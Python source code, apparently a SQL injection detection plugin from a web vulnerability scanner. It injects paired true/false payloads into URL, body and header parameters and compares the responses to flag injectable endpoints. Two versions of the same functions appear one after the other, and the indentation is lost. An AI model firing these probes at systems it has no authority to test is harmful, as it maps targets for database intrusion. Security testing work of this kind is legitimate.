def inject(self, req_false, req_true, payload_right, payload_false):
rf = request(**req_false)
rt = request(**req_true)
if rf != None and rt != None:
if self.dictdata.get("response").get("mime_stated") == "HTML":
rf_text = getFilteredPageContent(removeDynamicContent(rf.text, self.dynamic))
rt_text = getFilteredPageContent(removeDynamicContent(rt.text, self.dynamic))
else:
rf_text = removeDynamicContent(rf.text, self.dynamic)
rt_text = removeDynamicContent(rt.text, self.dynamic)
rf_similar = round(similar(rf_text, self.text), 3)
rt_similar = round(similar(rt_text, self.text), 3)
rt_rf_similar = round(similar(rf.text, rt.text), 3)
# print("{} rtpayload{} rfpayload{} rf:{},rt:{},both:{}".format(self.data.url_path,self.payload_rt,self.payload_rf,rf_similar,rt_similar,rt_rf_similar))
if rt_rf_similar != 1.0 and rt_similar > rf_similar and rt_similar > 0.98:
response_rt = response_parser(rt)
response_rf = response_parser(rf)
self.result.append({
"name": self.name,
"url": self.dictdata.get("url").get("url").split("?")[0],
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"payload": "payload_true:{} payload_false:{}".format(payload_right, payload_false),
"similar_rate": "payload_false_rate:{} payload_true_rate:{} payload_true_false_rate:{}".format(
rf_similar,
rt_similar, rt_rf_similar),
"request_true": response_rt.getrequestraw(),
"response_true": response_rt.getresponseraw(),
"request_false": response_rf.getrequestraw(),
"response_false": response_rf.getresponseraw(),
}
})
return True
def inject(self, req_false, req_true, payload_right, payload_false,
param_name):
found_flag = 0
response_rt = b""
response_rf = b""
rf_similar = 0
rt_similar = 0
rt_rf_similar = 0
for count_num in range(self.verify_count):
rf = request(**req_false)
rt = request(**req_true)
if rf != None and rt != None:
if self.dictdata.get("response").get("mime_stated") == "HTML":
rf_text = getFilteredPageContent(
removeDynamicContent(rf.text, self.dynamic))
rt_text = getFilteredPageContent(
removeDynamicContent(rt.text, self.dynamic))
else:
rf_text = removeDynamicContent(rf.text, self.dynamic)
rt_text = removeDynamicContent(rt.text, self.dynamic)
rf_similar = round(similar(rf_text, self.text), 3)
rt_similar = round(similar(rt_text, self.text), 3)
rt_rf_similar = round(similar(rf.text, rt.text), 3)
if rt_rf_similar != 1.0 and rt_similar > rf_similar and rt_similar > 0.98:
response_rt = response_parser(rt)
response_rf = response_parser(rf)
found_flag += count_num
continue
break
if found_flag == sum(range(self.verify_count)):
self.result.append({
"name":
self.name,
"url":
self.dictdata.get("url").get("url").split("?")[0],
"level":
self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg":
self.vulmsg,
"param":
param_name,
"payload":
"payload_true:{} payload_false:{}".format(
payload_right, payload_false),
"similar_rate":
"payload_true_rate:{} payload_false_rate:{} payload_true_false_rate:{}"
.format(rt_similar, rf_similar, rt_rf_similar),
"request_true":
response_rt.getrequestraw(),
"response_true":
response_rt.getresponseraw(),
"request_false":
response_rf.getrequestraw(),
"response_false":
response_rf.getresponseraw(),
}
})
return True
def verify(self):
if self.dictdata.get("url").get("extension") in notAcceptedExt:
return
parser = dictdata_parser(self.dictdata)
# send again . to find dynamic text
self.dynamic = []
r = request(**parser.getrawrequest())
if r != None:
ret = findDynamicContent(parser.getresponsebody().decode(errors="ignore"), r.text)
if ret:
self.dynamic.extend(ret)
if self.dictdata.get("response").get("mime_stated") == "HTML":
self.text = getFilteredPageContent(removeDynamicContent(r.text, self.dynamic))
else:
self.text = removeDynamicContent(r.text, self.dynamic)
else:
return
# test url and body params
sql_flag = [
"'and'{0}'='{1}",
'"and"{0}"="{1}',
]
#url and body
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
if params:
for param in params:
success = False
payloads = copy.deepcopy(sql_flag)
if param.get("value") in ["desc", "asc"]:
payloads = ",if('{0}'='{1}',1,(select 1 from information_schema.tables))"
for payload in payloads:
random_str = get_random_str(2).lower()
payload_right = payload.format(random_str + "a", random_str + "a")
payload_false = payload.format(random_str + "b", random_str + "c")
req_true = parser.getreqfromparam(param, "a", payload_right)
req_false = parser.getreqfromparam(param, "a", payload_false)
if self.inject(req_false, req_true, payload_right, payload_false):
success = True
break
if not success and str(param.get("value")).isdigit():
param_value = param.get("value")
random_num = random.randint(2, 8)
payloads_num = [
("/0", "*1"),
("/**/and+{0}={1}".format(random_num, random_num + 1),
"/**/and+{0}={1}".format(random_num, random_num)),
]
for payload_false, payload_right in payloads_num:
req_true = parser.getreqfromparam(param, "a", payload_right)
req_false = parser.getreqfromparam(param, "a", payload_false)
if self.inject(req_false, req_true, param_value + payload_right, param_value + payload_false):
break
pass
def verify(self):
if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
return
self.parser = dictdata_parser(self.dictdata)
# send again . to find dynamic text
self.dynamic = []
r = request(**self.parser.getrawrequest())
if r != None:
ret = findDynamicContent(
self.parser.getresponsebody().decode(errors="ignore"), r.text)
if ret:
self.dynamic.extend(ret)
if self.dictdata.get("response").get("mime_stated") == "HTML":
self.text = getFilteredPageContent(
removeDynamicContent(r.text, self.dynamic))
else:
self.text = removeDynamicContent(r.text, self.dynamic)
else:
return
# test url and body params
sql_flag = [
"' and '{0}'='{1}",
'" and "{0}"="{1}',
]
# url and body
params = self.dictdata.get("request").get("params").get("params_url") + \
self.dictdata.get("request").get("params").get("params_body")
if params:
for param in params:
success = False
payloads = copy.deepcopy(sql_flag)
if param.get("value") in ["desc", "asc"]:
payloads += [
",if('{0}'='{1}',1,(select 1 from information_schema.tables))"
]
for payload in payloads:
random_str = get_random_str(2).lower()
payload_right = payload.format(random_str + "a",
random_str + "a")
payload_false = payload.format(random_str + "b",
random_str + "c")
req_true = self.parser.getreqfromparam(
param, "a", payload_right)
req_false = self.parser.getreqfromparam(
param, "a", payload_false)
if self.inject(req_false, req_true, payload_right,
payload_false, param.get("name")):
success = True
break
if not success and str(param.get("value")).isdigit():
param_value = param.get("value")
random_num = random.randint(2, 8)
payloads_num = [
("/0", "*1"),
("/**/and+{0}={1}".format(random_num, random_num + 1),
"/**/and+{0}={1}".format(random_num, random_num)),
]
for payload_false, payload_right in payloads_num:
req_true = self.parser.getreqfromparam(
param, "a", payload_right)
req_false = self.parser.getreqfromparam(
param, "a", payload_false)
if self.inject(req_false, req_true,
param_value + payload_right,
param_value + payload_false,
param.get("name")):
break
pass
# host header 部分
if not plugin_set.get("sqli").get("header_inject"):
return
header_msg = {
"User-Agent": {
"msg":
"sqli_boolen_ua",
"default":
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
},
"Referer": {
"msg": "sqli_boolen_referer",
"default": "https://www.qq.com/search"
},
"X-Forwarded-For": {
"msg": "sqli_boolen_xff",
"default": "12.40.9.144"
},
"Real-Ip": {
"msg": "sqli_boolen_ri",
"default": "2.40.9.144"
},
"X-Forwarded-Host": {
"msg": "sqli_boolen_xfh",
"default": "2.40.9.144"
},
}
reqs = []
for k, v in header_msg.items():
if self.output(v.get("msg")):
logger.debug("start {} inject ".format(k))
headers = copy.deepcopy(
self.dictdata.get("request").get("headers"))
if k not in headers.keys():
headers[k] = v.get("default")
reqs.append((headers, k, v))
mythread(self.inject_headers, reqs, cmd_line_options.threads)
def inject_headers(self, data):
sql_flag = [
"' and '{0}'='{1}",
'" and "{0}"="{1}',
]
headers, k, v = data
for sql_ in sql_flag:
found_flag = 0
response_rt = b""
response_rf = b""
rf_similar = 0
rt_similar = 0
rt_rf_similar = 0
payload_right = ""
payload_false = ""
random_str = get_random_str(2).lower()
for count_num in range(self.verify_count):
req_false_header = copy.deepcopy(headers)
req_true_header = copy.deepcopy(headers)
payload_false = sql_.format(random_str + "b", random_str + "c")
payload_right = sql_.format(random_str + "b", random_str + "b")
req_false_header[k] = req_false_header[k] + payload_false
req_true_header[k] = req_true_header[k] + payload_right
req_false = self.parser.generaterequest(
{"headers": req_false_header})
req_true = self.parser.generaterequest(
{"headers": req_true_header})
rf = request(**req_false)
rt = request(**req_true)
if rf != None and rt != None:
if self.dictdata.get("response").get(
"mime_stated") == "HTML":
rf_text = getFilteredPageContent(
removeDynamicContent(rf.text, self.dynamic))
rt_text = getFilteredPageContent(
removeDynamicContent(rt.text, self.dynamic))
else:
rf_text = removeDynamicContent(rf.text, self.dynamic)
rt_text = removeDynamicContent(rt.text, self.dynamic)
rf_similar = round(similar(rf_text, self.text), 3)
rt_similar = round(similar(rt_text, self.text), 3)
rt_rf_similar = round(similar(rf.text, rt.text), 3)
if rt_rf_similar != 1.0 and rt_similar > rf_similar and rt_similar > 0.98:
response_rt = response_parser(rt)
response_rf = response_parser(rf)
found_flag += count_num
continue
break
if found_flag == sum(range(self.verify_count)):
self.result.append({
"name":
self.name,
"url":
self.dictdata.get("url").get("url").split("?")[0],
"level":
self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg":
self.vulmsg,
"param":
"header's {}".format(k),
"payload":
"payload_true:{} payload_false:{}".format(
payload_right, payload_false),
"similar_rate":
"payload_true_rate:{} payload_false_rate:{} payload_true_false_rate:{}"
.format(rt_similar, rf_similar, rt_rf_similar),
"request_true":
response_rt.getrequestraw(),
"response_true":
response_rt.getresponseraw(),
"request_false":
response_rf.getrequestraw(),
"response_false":
response_rf.getresponseraw(),
}
})
return